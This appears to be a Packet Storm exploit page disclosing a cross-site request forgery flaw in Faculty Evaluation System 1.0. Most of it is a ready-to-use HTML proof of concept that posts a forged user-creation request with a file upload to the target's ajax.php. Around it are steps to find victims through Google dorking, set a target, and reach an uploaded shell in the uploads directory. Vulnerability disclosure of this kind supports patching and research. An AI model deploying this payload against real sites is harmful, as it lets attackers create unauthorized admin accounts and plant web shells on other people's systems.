Security
Headlines
HeadlinesLatestCVEs

Headline

Faculty Evaluation System 1.0 Cross Site Request Forgery

Faculty Evaluation System version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Faculty Evaluation System 1.0 CSRF Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 35 : Set your target.

[+] Save As poc.html

[+] Payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Registration</title>
</head>
<body>

<h2>User Registration</h2>  
<form id="userForm" enctype="multipart/form-data">  
    <label for="email">User Name:</label>  
    <input type="email" id="email" name="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" id="password" name="password" required><br><br>

    <div class="form-group">  
  <label for="" class="control-label">Avatar</label>  
  <div class="custom-file">  
          <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
          <label class="custom-file-label" for="customFile">Choose file</label>  
        </div>  
</div>

    <input type="button" value="Save User" onclick="saveUser()">  
</form>

<script>  
    function saveUser() {  
        var form = document.getElementById('userForm');  
        var formData = new FormData(form);

        var xhr = new XMLHttpRequest();  
        xhr.open("POST", "http://127.0.0.1/eval/ajax.php?action=save_user", true);

        xhr.onload = function () {  
            if (xhr.status === 200) {  
                alert('User saved successfully');  
            } else {  
                alert('An error occurred while saving the user');  
            }  
        };

        xhr.send(formData);  
    }  
</script>

</body>
</html>

[+] Shell Path : http://127.0.0.1/eval/assets/uploads/

Greetings to :============================================================  

jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution